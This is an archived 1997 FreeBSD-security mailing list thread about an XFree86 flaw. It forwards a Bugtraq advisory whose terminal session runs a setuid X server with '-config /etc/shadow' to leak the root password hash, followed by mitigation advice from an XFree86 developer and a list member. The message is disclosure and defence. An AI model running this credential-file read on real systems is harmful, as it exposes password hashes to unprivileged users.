Skip site navigation (1)Skip section navigation (2)
Date:      Sun, 23 Nov 1997 13:20:20 -0500 (EST)
From:      spork <spork@super-g.com>
To:        David Dawes <dawes@rf900.physics.usyd.edu.au>
Cc:        Philippe Regnauld <regnauld@deepo.prosa.dk>, freebsd-security@FreeBSD.ORG
Subject:   Re: Fwd: "XFree86 insecurity" <root@SHEGG.RH1.IIT.EDU>
Message-ID:  <Pine.BSF.3.96.971123131801.1101A-100000@super-g.inch.com>
In-Reply-To: <19971122192453.17451@rf900.physics.usyd.edu.au>

next in thread | previous in thread | raw e-mail | index | archive | help
A quick fix I already had in place from the old xterm exploits was to put
all the people that use X (well, just me) in a group and make the X
binaries with suid bits only executable by that group rather than
world-execute.  While it's not truly a fix, it does limit your
vulnerability.  I've yet to play with XDM...

Charles Sprickman
spork@super-g.com
---- 
                           "I'm not a prophet or a stone-age man
                           Just a mortal with potential of a superman
                           I'm living on"      -DB

On Sat, 22 Nov 1997, David Dawes wrote:

> On Sat, Nov 22, 1997 at 08:23:50AM +0100, Philippe Regnauld wrote:
> 
> We (XFree86) are aware of this one.  I agree with the recomendation of
> removing the setuid bit and using xdm to start the Xserver, and if you
> have XFree86 on a machine where this problem is significant, you should
> consider doing this.
> 
> The fix is to disable the '-config' Xserver option.  This will be removed
> in our next release, and also in the next X11 release from The Open
> Group.  It was only added to get around problems on OS's with small
> command line length limits, and should never have been enabled for most
> Unix-like OSs.  The problem isn't XFree86-specific.  It affects any
> platform using X11R6 XC/TOG code where the Xserver is installed setuid
> root (although on non-XFree86 platforms you may need to be a little more
> inventive with the use of the -config option).
> 
> David
> 
> >Cute one.
> >
> >-----Forwarded message from shegget <root@SHEGG.RH1.IIT.EDU>-----
> >
> >Date:         Fri, 21 Nov 1997 18:35:36 +0000
> >From: shegget <root@SHEGG.RH1.IIT.EDU>
> >Subject:      XFree86 insecurity
> >To: BUGTRAQ@NETSPACE.ORG
> >
> >                  plaguez security advisory n.10
> >
> >                        XFree86 insecurity
> >
> >
> >
> >
> >Program:   XF86_*, the XFree86 servers (XF86_SVGA, XF86_VGA16, ...)
> >
> >Version:   Tested on XFree86 3.3.1 (current), 3.2.9 and 3.1.2.
> >           Other versions as well.
> >
> >OS:        All
> >
> >Impact:    The XFree86 servers let you specify an alternate configuration
> >           file and do not check whether you have rights to read it.
> >           Any user can read files with root permissions.
> >
> >
> >
> >
> >hello,
> >just a short one to tell you about this "feature" I found in all default
> >XFree86 servers...
> >
> >
> >Here it is:
> >
> >Script started on Sat Aug 23 15:32:36 1997
> >Loading /usr/lib/kbd/keytables/fr-latin1.map
> >[plaguez@plaguez plaguez]$ uname -a
> >Linux plaguez 2.0.31 #10 Wed Aug 20 04:24:38 MET DST 1997 i586
> >[plaguez@plaguez plaguez]$ ls -al /etc/shadow
> >-rw-------   1 root     bin          1039 Aug 21 20:12  /etc/shadow
> >[plaguez@plaguez bin]$ id
> >uid=502(plaguez) gid=500(users) groups=500(users)
> >[plaguez@plaguez plaguez]$ cd /usr/X11R6/bin
> >[plaguez@plaguez bin]$ ./XF86_SVGA -config /etc/shadow
> >Unrecognized option: root:qEXaUxSeQ45ls:10171:-1:-1:-1:-1:-1:-1
> >use: X [:<display>] [option]
> >-a #                   mouse acceleration (pixels)
> >-ac                    disable access control restrictions
> >-audit int             set audit trail level
> >-auth file             select authorization file
> >bc                     enable bug compatibility
> >-bs                    disable any backing store support
> >-c                     turns off key-click
> >
> >... and so on.  HINT: look at the first XF86_SVGA output line.
> >
> >
> >
> >
> >
> >Patch:
> >------
> >
> >If you run xdm, you should consider removing the setuid bit of the
> >servers.
> >
> >If not, well, wait for the XFree86 Project to bring you a patch, since I'm
> >too lazy to find and fix it.
> >
> >
> >
> >
> >
> >later,
> >
> >-plaguez
> >dube0866@eurobretagne.fr
> >
> >-----End of forwarded message-----
> >
> >-- 
> >                                                              -- Phil
> >
> > -[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]-
> 




Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.3.96.971123131801.1101A-100000>